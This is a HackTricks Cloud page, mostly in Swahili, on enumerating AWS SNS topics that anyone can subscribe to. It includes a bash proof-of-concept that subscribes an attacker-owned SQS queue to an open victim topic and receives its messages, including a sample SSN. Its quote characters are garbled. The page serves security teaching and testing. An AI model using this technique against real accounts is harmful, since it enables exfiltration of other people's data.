HackTricks CloudAWS - SNS Unauthenticated Enum
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na đŹ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter đŚ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
SNS
Kwa maelezo zaidi kuhusu SNS angalia:
Wazi kwa Wote
Unapoweka topic ya SNS kupitia web console inawezekana kuonyesha kwamba Kila mtu anaweza kuchapisha na kujiandikisha kwenye topic:
.png)
Kwa hivyo ikiwa utakapopata ARN ya topics ndani ya account (au kwa brute forcing majina yanayowezekana ya topics) unaweza kuangalia kama unaweza kuchapisha au kujiandikisha kwao.
Hii itakuwa sawa na sera ya rasilimali ya SNS topic kuruhusu sns:Subscribe kwa * (au kwa accounts za nje), yoyote principal anaweza kutengeneza subscription itakayowasilisha ujumbe wote wa topic ujao kwa SQS queue wanayomiliki. Wakati mmiliki wa queue anapoanzisha subscription, hakuna uthibitisho wa binadamu unaohitajika kwa SQS endpoints.
Mfano (us-east-1)
```bash REGION=us-east-1 # Victim account (topic owner) VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)Open the topic to anyone subscribing
cat > /tmp/topic-policy.json <<JSON {âVersionâ:â2012-10-17â,âStatementâ:[{âSidâ:âOpenSubscribeâ,âEffectâ:âAllowâ,âPrincipalâ:â*â,âActionâ:âsns:Subscribeâ,âResourceâ:â$VICTIM_TOPIC_ARNâ}]} JSON aws sns set-topic-attributes âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âattribute-name Policy âattribute-value file:///tmp/topic-policy.json
Attacker account (queue owner)
ATTACKER_Q_URL=$(aws sqs create-queue âqueue-name attacker-exfil-queue-$(date +%s) âregion $REGION âquery QueueUrl âoutput text) ATTACKER_Q_ARN=$(aws sqs get-queue-attributes âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âattribute-names QueueArn âquery Attributes.QueueArn âoutput text)
Allow the victim topic to send to the attacker queue
cat > /tmp/sqs-policy.json <<JSON {âVersionâ:â2012-10-17â,âStatementâ:[{âSidâ:âAllowVictimTopicSendâ,âEffectâ:âAllowâ,âPrincipalâ:{âServiceâ:âsns.amazonaws.comâ},âActionâ:âsqs:SendMessageâ,âResourceâ:â$ATTACKER_Q_ARNâ,âConditionâ:{âArnEqualsâ:{âaws:SourceArnâ:â$VICTIM_TOPIC_ARNâ}}}]} JSON aws sqs set-queue-attributes âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âattributes Policy=â$(cat /tmp/sqs-policy.json)â
Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)
SUB_ARN=$(aws sns subscribe âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âprotocol sqs ânotification-endpoint â$ATTACKER_Q_ARNâ âquery SubscriptionArn âoutput text)
Validation: publish and receive
aws sns publish âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âmessage {pii:ssn:123-45-6789} aws sqs receive-message âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âmax-number-of-messages 1 âwait-time-seconds 10 âquery Messages[0].Body âoutput text
</details>
> [!TIP]
> Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Jifunze na fanya mazoezi ya Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** đŹ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** đŚ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
>
> </details>